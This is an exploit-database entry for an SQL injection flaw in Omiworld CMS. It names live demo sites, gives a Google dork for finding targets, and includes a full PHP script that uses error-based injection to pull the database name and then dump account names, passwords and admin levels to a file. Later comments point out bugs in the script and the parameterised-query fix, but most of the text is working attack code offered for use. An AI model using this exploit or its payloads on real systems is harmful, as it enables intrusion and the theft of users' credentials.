ID 1337DAY-ID-18013
Type zdt
Reporter The UnKnØwN
Modified 2012-04-09T00:00:00
Description
Exploit for php platform in category web applications
====================== Vulnerability info ====================
[+] Exploit Title : Omiworld CMS - SQL Injection Vulnerability
[+] Date : 09-04-2012
[+] Author : The UnKnØwN
[+] Software Link : http://www.mediafire.com/?ixfs79gw2clicrx
[+] Version : 3
[+] Category : Webapps
[+] Google Dork : intext:Certaines images sont la propriétés de Ankama Games , omiworld
[+] Tested on : Windows xp
[+] Demo site : - http://ouragan-games.redheberg.com/ouragan//index.php?pages=home
- http://beta-house.fr/index.php?pages=home
- http://opium.exano.net/index.php?pages=home
============================ Greets ==========================
Greets to : Soka - Hony - CouldFire - kimgx12 - w0dm4n - The Crazy3D Team
and all Algerian h4x0rs
www.izzi-hack.com - www.dofus-exploit.com
===================== Vulnerability details ==================
there is an unfiltered POST parameter in vip_validation.php:
$personnage = $_POST['perso'];
$sql = "SELECT * FROM personnages WHERE guid = $personnage";
=========================== Exploit ==========================
page : http://site/path/index.php?pages=vip_validation
post data : send=Envoyer&perso={inject}
There is also an exploit coded in php for Black Hole Reactør (http://www.mediafire.com/?ij9rfpfw6s7uzxf for windows only)
load exploits/webapp/omiworld_injection.php
set HOST target
set MODE (1 for admin accounts/2 for all accounts)
set FILE (save format TXT/SQL)
exploit
============================= END =============================
<?php
//NOTE : If you are using BHR put this file in \exploits\webapp folder
/*
!Omiworld_Injection
@ HOST = localhost = Target URL
@ PORT = 80 = Target Port
@ PATH = / = Web site path
@ MODE = 1 = Injection mode
@ FILE = sql = Save type
*/
// Silence every PHP diagnostic for the run. This also masks genuine failures
// (socket errors, bad argv); it does not rescue the split() call further down,
// which is a fatal error on PHP >= 7 regardless of error_reporting.
error_reporting(0);
// No execution-time cap: the dump loops below issue one request per row.
set_time_limit(0);
// 5 s socket timeout, picked up by fsockopen()/stream_get_contents() in
// http_send(). Since PostIt() sends HTTP/1.0 with "Connection: keep-alive" and
// http_send() reads to EOF, this is presumably the wait per request — confirm.
ini_set("default_socket_timeout", 5);
/**
 * Open a raw TCP connection to $host:$port, write $packet verbatim and return
 * everything the peer sends until it closes the connection or the
 * default_socket_timeout expires.
 *
 * Note: the helper terminates the whole script with die() when the connection
 * cannot be opened instead of reporting the failure to its caller. The socket
 * handle is not closed explicitly; it is released when $sock leaves scope.
 *
 * @param string     $host   hostname or IP address
 * @param int|string $port   TCP port
 * @param string     $packet complete request bytes, status line and headers included
 * @return string|false raw response (headers and body) or false if the read fails
 */
function http_send($host, $port, $packet)
{
    $sock = fsockopen($host, $port);
    if ($sock === false) {
        die("\n[-] No response from {$host}:{$port}\n");
    }
    fwrite($sock, $packet);
    $response = stream_get_contents($sock);
    return $response;
}
/**
 * Append one "account:pass:level" line to $file (created if missing).
 *
 * $host is accepted but never used. Beware the arity mismatch in this file:
 * both call sites in the mode switch pass only four arguments, so there $file
 * receives the account name (the file opened is named after the account) and
 * $level is undefined inside this function.
 *
 * @param string $host    unused
 * @param string $file    path of the output file
 * @param string $account account column value
 * @param string $pass    pass column value
 * @param string $level   level column value
 * @return void
 */
function write_txt($host, $file, $account, $pass, $level)
{
    $line = sprintf("%s:%s:%s\n", $account, $pass, $level);
    $handle = fopen($file, "a+");
    fwrite($handle, $line);
    fclose($handle);
}
/**
 * Append one INSERT statement for the given row to $file (created if missing).
 *
 * The emitted text is kept exactly as the original produced it: the table
 * name is wrapped in single quotes (a string literal, not a MySQL identifier)
 * and the values are interpolated without escaping, so the output is not
 * directly importable.
 *
 * @param string $file    path of the output file
 * @param string $account account column value
 * @param string $pass    pass column value
 * @param string $level   level column value
 * @return void
 */
function write_sql($file, $account, $pass, $level)
{
    $statement = "INSERT INTO 'account_inj' VALUES ('" . $account . "', '" . $pass . "', '" . $level . "')\n";
    $handle = fopen($file, "a+");
    fwrite($handle, $statement);
    fclose($handle);
}
/**
 * Append a per-host header line to $file: a SQL block comment when the file
 * is literally named "accounts.sql", a "====" banner otherwise.
 *
 * Dead code: nothing in this file calls write(). The loose == comparison of
 * the original is retained.
 *
 * @param string $host target host, echoed into the header
 * @param string $file path of the output file
 * @return void
 */
function write($host, $file)
{
    $isSqlOutput = ($file == "accounts.sql");
    $header = $isSqlOutput
        ? "/* Accounts of " . $host . " */\n"
        : "=========== Accounts of " . $host . " ===========\n";
    $handle = fopen($file, "a+");
    fwrite($handle, $header);
    fclose($handle);
}
/**
 * Cut out the text between the first "~'" and the first "'~1" in $page.
 *
 * The callers inject concat(0x7e, 0x27, <value>, 0x27, 0x7e) server-side, so
 * <value> is expected to come back framed like this inside the error text the
 * vulnerable page echoes. A page that does not echo database errors to the
 * client yields no frame and nothing to extract.
 *
 * Edge behaviour (unchanged): when a marker is missing strpos() returns false,
 * which takes part in the arithmetic as 0, so the result is an unrelated slice
 * of $page rather than "" — callers that test the result with empty() can be
 * misled.
 *
 * @param string $page raw HTTP response as returned by http_send()
 * @return string|false extracted value
 */
function fetch_data($page)
{
    $open  = "~'";
    $close = "'~1";
    $start = strpos($page, $open) + strlen($open);
    $end   = strpos($page, $close);
    return substr($page, $start, $end - $start);
}
/**
 * POST $payload to {$path}index.php?pages=vip_validation over a raw socket
 * and return the full response via http_send().
 *
 * $path must already end with "/" — "index.php" is appended directly.
 * $payload is sent as-is (no URL encoding) with a byte-exact Content-Length.
 * The request is HTTP/1.0 yet asks for keep-alive; since http_send() reads
 * until EOF, each call presumably lasts until the server closes or the socket
 * timeout fires — confirm against a real server.
 *
 * @param string     $host    hostname or IP address
 * @param int|string $port    TCP port
 * @param string     $path    web root path with trailing slash
 * @param string     $payload form-encoded body
 * @return string|false raw response from http_send()
 */
function PostIt($host, $port, $path, $payload)
{
    $requestLine = sprintf("POST %sindex.php?pages=vip_validation HTTP/1.0\r\n", $path);
    $headers = sprintf(
        "Host: %s\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %d\r\nConnection: keep-alive\r\n\r\n",
        $host,
        strlen($payload)
    );
    return http_send($host, $port, $requestLine . $headers . $payload);
}
// --- Banner -------------------------------------------------------------------
print "\n+-----------------------[ The Crazy3D Team ]--------------------------+";
print "\n| OmiWorld CMS SQL Injection Exploit |";
print "\n| by The UnKn0wN |";
print "\n| Greets to : The Crazy3D's members and all Algerian h4x0rs |";
print "\n+---------------------------------------------------------------------+";
print "\n| www.Dofus-Exploit.com | WwW.IzzI-Hack.com |";
print "\n+---------------------------------------------------------------------+\n";
// --- Argument handling --------------------------------------------------------
// Off by one: five positional arguments are read ($argv[1]..$argv[5]), which
// needs $argc >= 6, yet only $argc < 5 is rejected. With exactly four
// arguments ($argc == 5) $argv[5] is unset, $file becomes null and falls into
// the "accounts.sql" branch below.
if ($argc < 5)
{
print "\nUsage......: php $argv[0] <host> <port> <path> <mode> <save>\n";
print "\nExample....: php $argv[0] localhost 80 / 1 txt ";
// Mode "3" in this example has no matching case in the switch below.
print "\nExample....: php $argv[0] localhost 80 /site/ 3 sql \n";
die();
}
$host = $argv[1];
$port = $argv[2];
// Expected to end with "/": PostIt() appends "index.php" directly.
$path = $argv[3];
$mode = $argv[4];
$file = $argv[5];
// Anything other than "txt" (including the unset case above) selects SQL output.
if($file == "txt") $file = "accounts.txt";
else $file = "accounts.sql";
// --- Vulnerability probe ------------------------------------------------------
// The advisory above shows vip_validation.php interpolating POST['perso']
// straight into "SELECT * FROM personnages WHERE guid = $personnage". The probe
// only checks that the page answers with the literal text "Erreur SQL", i.e.
// that database error output reaches the client. Application-side, the
// remedy is a parameterised query and not echoing database errors.
$inj_test = "or '1'='1";
// The selected value is framed with 0x7e,0x27 ... 0x27,0x7e ("~'" ... "'~");
// fetch_data() looks for exactly that frame in the echoed error text.
$inj_db = " and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1";
$payload = "send=Envoyer&perso=test".$inj_test."";
// PHP function names are case-insensitive, so postit() resolves to PostIt().
if(!(preg_match("#Erreur SQL#", postit($host,$port, $path,$payload)))) die ("[-] CMS not vulnerable\n");
else print ("[+] CMS can be exploited!\n");
$payload = "send=Envoyer&perso=test".$inj_db."";
$db = fetch_data(PostIt($host,$port,$path,$payload));
// fetch_data() can return an unrelated slice of the page (not "") when the
// markers are absent, so empty() is not a reliable failure test here.
if(empty($db)) die("[-] Can't found the database!\n");
print "[+] Database: ".$db."\n";
// --- Account dump -------------------------------------------------------------
// Mode 1 reads rows with level>0 ("admin accounts"), mode 2 every row; the two
// cases differ only by that WHERE clause. Each row costs one HTTP request. Any
// other mode matches no case and the script ends silently.
switch ($mode)
{
case 1:
$inj_count_accounts = " and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM `".$db."`.accounts WHERE level>0)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1";
$payload = "send=Envoyer&perso=test".$inj_count_accounts."";
$num = fetch_data(PostIt($host,$port,$path,$payload));
print "[+] Admin accounts: ".$num."\n";
// $num is whatever string fetch_data() cut out; the loop bound is only
// meaningful when that is a digit string (PHP 7 treats a non-numeric string
// as 0, PHP 8 compares int vs. non-numeric string as strings).
for($i=0; $i<$num; $i++)
{
$inj_accounts = " and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,account,0x2f,pass,0x2f,level,0x27,0x7e) FROM `{$db}`.accounts WHERE level>0 LIMIT {$i},1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1";
$payload = "send=Envoyer&perso=test".$inj_accounts."";
$data = fetch_data(PostIt($host,$port,$path,$payload));
// split() (POSIX regex) was removed in PHP 7.0 — fatal on any current
// interpreter. The class [/.-] also splits on "." and "-", so an account or
// password containing either character is mis-parsed.
list($account, $pass, $level) = split('[/.-]', $data);
print "Account: {$account}\t Pass: {$pass}\t Level: {$level}\n";
// write_txt() is declared with five parameters ($host first) but called with
// four: $file lands in $host, the file actually opened is named after the
// account, and $level is undefined inside the function.
if($file == "accounts.txt")
write_txt($file, $account, $pass, $level);
else
write_sql($file, $account, $pass, $level);
}
break;
case 2:
$inj_count_accounts = " and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM `".$db."`.accounts)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1";
$payload = "send=Envoyer&perso=test".$inj_count_accounts."";
$num = fetch_data(PostIt($host,$port,$path,$payload));
print "[+] Accounts: ".$num."\n";
for($i=0; $i<$num; $i++)
{
$inj_accounts = " and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,account,0x2f,pass,0x2f,level,0x27,0x7e) FROM `{$db}`.accounts LIMIT {$i},1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1";
$payload = "send=Envoyer&perso=test".$inj_accounts."";
$data = fetch_data(PostIt($host,$port,$path,$payload));
// Same split() removal and [/.-] mis-parsing issues as in case 1.
list($account, $pass, $level) = split('[/.-]', $data);
print "Account: {$account}\t Pass: {$pass}\t Level: {$level}\n";
// Same write_txt() arity mismatch as in case 1.
if($file == "accounts.txt")
write_txt($file, $account, $pass, $level);
else
write_sql($file, $account, $pass, $level);
}
break;
}
# 0day.today [2018-03-19] #
{"published": "2012-04-09T00:00:00", "id": "1337DAY-ID-18013", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for php platform in category web applications", "enchantments": {"score": {"value": 2.6, "vector": "NONE", "modified": "2018-03-19T21:13:22", "rev": 2}, "dependencies": {"references": [{"type": "nessus", "idList": ["DEBIAN_DSA-4100.NASL", "UBUNTU_USN-3606-1.NASL", "AL2_ALAS-2019-1327.NASL", "NEWSTART_CGSL_NS-SA-2019-0185_LIBTIFF.NASL", "ALA_ALAS-2019-1306.NASL", "UBUNTU_USN-3602-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310843483", "OPENVAS:1361412562310704100", "OPENVAS:1361412562310875292", "OPENVAS:1361412562310875294", "OPENVAS:1361412562310812582"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:419C347150598833F1C493E269FE4871", "CFOUNDRY:B5964D2AB72D599E586D491432260541"]}, {"type": "ubuntu", "idList": ["USN-3602-1", "USN-3606-1"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4100-1:12A86"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:8162", "SECURITYVULNS:DOC:18013"]}], "modified": "2018-03-19T21:13:22", "rev": 2}, "vulnersScore": 2.6}, "type": "zdt", "lastseen": "2018-03-19T21:13:22", "edition": 2, "title": "Omiworld CMS - SQL Injection Vulnerability", "href": "https://0day.today/exploit/description/18013", "modified": "2012-04-09T00:00:00", "bulletinFamily": "exploit", "viewCount": 6, "cvelist": [], "sourceHref": "https://0day.today/exploit/18013", "references": [], "reporter": "The UnKn\u00d8wN", "sourceData": "====================== Vulnerability info ====================\r\n[+] Exploit Title : Omiworld CMS - SQL Injection Vulnerability\r\n[+] Date : 09-04-2012\r\n[+] Author : The UnKn\u00d8wN\r\n[+] Software Link : http://www.mediafire.com/?ixfs79gw2clicrx\r\n[+] Version : 3\r\n[+] Category : Webapps\r\n[+] Google Dork : intext:Certaines images sont la propri\u00e9t\u00e9s de Ankama Games , omiworld\r\n[+] Tested on : Windows xp\r\n[+] Demo site : - 
http://ouragan-games.redheberg.com/ouragan//index.php?pages=home\r\n - http://beta-house.fr/index.php?pages=home\r\n - http://opium.exano.net/index.php?pages=home\r\n============================ Greets ========================== \r\nGreets to : Soka - Hony - CouldFire - kimgx12 - w0dm4n - The Crazy3D Team \r\n and all Algerian h4x0rs\r\n www.izzi-hack.com - www.dofus-exploit.com\r\n===================== Vulnerability details ================== \r\nthere is an unprotected post in vip_validation.php\r\n $personnage = $_POST['perso'];\r\n$sql = \"SELECT * FROM personnages WHERE guid = $personnage\";\r\n=========================== Exploit ==========================\r\npage : http://site/path/index.php?pages=vip_validation\r\npost data : send=Envoyer&perso={inject}\r\n\r\nThere is also an exploit coded in php for Black Hole React\u00f8r (http://www.mediafire.com/?ij9rfpfw6s7uzxf for windows only)\r\n\r\nload exploits/webapp/omiworld_injection.php\r\nset HOST target\r\nset MODE (1 for admin accounts/2 for all accounts)\r\nset FILE (save format TXT/SQL)\r\nexploit\r\n============================= END =============================\r\n\r\n<?php\r\n//NOTE : If you are using BHR put this file in \\exploits\\webapp folder\r\n/*\r\n!Omiworld_Injection\r\n@ HOST = localhost = Target URL\r\n@ PORT = 80 = Target Port\r\n@ PATH = / = Web site path\r\n@ MODE = 1 = Injection mode\r\n@ FILE = sql = Save type\r\n*/\r\nerror_reporting(0);\r\nset_time_limit(0);\r\nini_set(\"default_socket_timeout\", 5);\r\n\r\nfunction http_send($host,$port, $packet)\r\n{\r\n if (!($sock = fsockopen($host, $port)))\r\n die(\"\\n[-] No response from {$host}:{$port}\\n\");\r\n \r\n fputs($sock, $packet);\r\n return stream_get_contents($sock);\r\n}\r\nfunction write_txt($host, $file, $account, $pass, $level)\r\n{\r\n\t$save_file = fopen(\"\".$file.\"\", \"a+\"); \r\n\tfwrite($save_file, \"$account:$pass:$level\\n\");\r\n\tfclose($save_file);\r\n}\r\nfunction write_sql($file, $account, $pass, 
$level)\r\n{\r\n\t$save_file = fopen(\"\".$file.\"\", \"a+\");\r\n\tfwrite($save_file, \"INSERT INTO 'account_inj' VALUES ('$account', '$pass', '$level')\\n\");\r\n\tfclose($save_file);\r\n}\r\nfunction write($host, $file)\r\n{\r\n\t$save_file = fopen(\"\".$file.\"\", \"a+\");\r\n\tif($file == \"accounts.sql\")\r\n\t\tfwrite($save_file, \"/* Accounts of $host */\\n\");\r\n\telse\r\n\t\tfwrite($save_file, \"=========== Accounts of $host ===========\\n\");\r\n\tfclose($save_file);\r\n}\r\nfunction fetch_data($page)\r\n{\r\n\t$debut = \"~'\";\r\n\t$debutTxt = strpos( $page, $debut ) + strlen( $debut ); \r\n\t$fin = \"'~1\";\r\n\t$finTxt = strpos( $page, $fin ); \r\n\t$data_fetch = substr($page, $debutTxt, $finTxt - $debutTxt ); \r\n\treturn $data_fetch;\r\n}\r\nfunction PostIt($host,$port,$path,$payload){\r\n$packet = \"POST {$path}index.php?pages=vip_validation HTTP/1.0\\r\\n\";\r\n$packet .= \"Host: {$host}\\r\\n\";\r\n$packet .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n$packet .= \"Content-Length: \".strlen($payload).\"\\r\\n\";\r\n$packet .= \"Connection: keep-alive\\r\\n\\r\\n{$payload}\";\r\nreturn http_send($host,$port, $packet);\r\n}\r\nprint \"\\n+-----------------------[ The Crazy3D Team ]--------------------------+\";\r\nprint \"\\n| OmiWorld CMS SQL Injection Exploit |\";\r\nprint \"\\n| by The UnKn0wN |\";\r\nprint \"\\n| Greets to : The Crazy3D's members and all Algerian h4x0rs |\";\r\nprint \"\\n+---------------------------------------------------------------------+\";\r\nprint \"\\n| www.Dofus-Exploit.com | WwW.IzzI-Hack.com |\";\r\nprint \"\\n+---------------------------------------------------------------------+\\n\";\r\n\r\nif ($argc < 5)\r\n{\r\n print \"\\nUsage......: php $argv[0] <host> <port> <path> <mode> <save>\\n\";\r\n print \"\\nExample....: php $argv[0] localhost 80 / 1 txt \";\r\n print \"\\nExample....: php $argv[0] localhost 80 /site/ 3 sql \\n\";\r\n die();\r\n}\r\n\r\n$host = $argv[1];\r\n$port = 
$argv[2];\r\n$path = $argv[3];\r\n$mode = $argv[4];\r\n$file = $argv[5];\r\n\r\nif($file == \"txt\") $file = \"accounts.txt\";\r\nelse $file = \"accounts.sql\";\r\n$inj_test = \"or '1'='1\";\r\n$inj_db = \" and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1\";\r\n$payload = \"send=Envoyer&perso=test\".$inj_test.\"\";\r\n\r\nif(!(preg_match(\"#Erreur SQL#\", postit($host,$port, $path,$payload)))) die (\"[-] CMS not vulnerable\\n\");\r\nelse print (\"[+] CMS can be exploited!\\n\");\r\n$payload = \"send=Envoyer&perso=test\".$inj_db.\"\";\r\n$db = fetch_data(PostIt($host,$port,$path,$payload));\r\nif(empty($db)) die(\"[-] Can't found the database!\\n\");\r\nprint \"[+] Database: \".$db.\"\\n\";\r\nswitch ($mode)\r\n{\r\ncase 1:\r\n$inj_count_accounts = \" and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM `\".$db.\"`.accounts WHERE level>0)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1\";\r\n$payload = \"send=Envoyer&perso=test\".$inj_count_accounts.\"\";\r\n$num = fetch_data(PostIt($host,$port,$path,$payload));\r\nprint \"[+] Admin accounts: \".$num.\"\\n\";\r\nfor($i=0; $i<$num; $i++)\r\n{\r\n$inj_accounts = \" and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,account,0x2f,pass,0x2f,level,0x27,0x7e) FROM `{$db}`.accounts WHERE level>0 LIMIT {$i},1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1\";\t\r\n$payload = \"send=Envoyer&perso=test\".$inj_accounts.\"\";\r\n$data = fetch_data(PostIt($host,$port,$path,$payload));\r\n\r\nlist($account, $pass, $level) = split('[/.-]', $data);\r\nprint \"Account: {$account}\\t Pass: {$pass}\\t Level: {$level}\\n\";\r\n\t\r\nif($file == 
\"accounts.txt\") \r\nwrite_txt($file, $account, $pass, $level);\t\t\t\r\nelse \r\nwrite_sql($file, $account, $pass, $level);\r\n}\r\nbreak;\r\ncase 2:\r\n$inj_count_accounts = \" and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM `\".$db.\"`.accounts)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1\";\r\n$payload = \"send=Envoyer&perso=test\".$inj_count_accounts.\"\";\r\n$num = fetch_data(PostIt($host,$port,$path,$payload));\r\nprint \"[+] Accounts: \".$num.\"\\n\";\r\nfor($i=0; $i<$num; $i++)\r\n{\r\n$inj_accounts = \" and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,account,0x2f,pass,0x2f,level,0x27,0x7e) FROM `{$db}`.accounts LIMIT {$i},1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1\";\t\r\n$payload = \"send=Envoyer&perso=test\".$inj_accounts.\"\";\r\n$data = fetch_data(PostIt($host,$port,$path,$payload));\r\n\r\nlist($account, $pass, $level) = split('[/.-]', $data);\r\nprint \"Account: {$account}\\t Pass: {$pass}\\t Level: {$level}\\n\";\r\n\t\r\nif($file == \"accounts.txt\") \r\nwrite_txt($file, $account, $pass, $level);\t\t\t\r\nelse \r\nwrite_sql($file, $account, $pass, $level);\r\n}\r\nbreak; \r\n}\r\n\r\n\n\n# 0day.today [2018-03-19] #"}
{}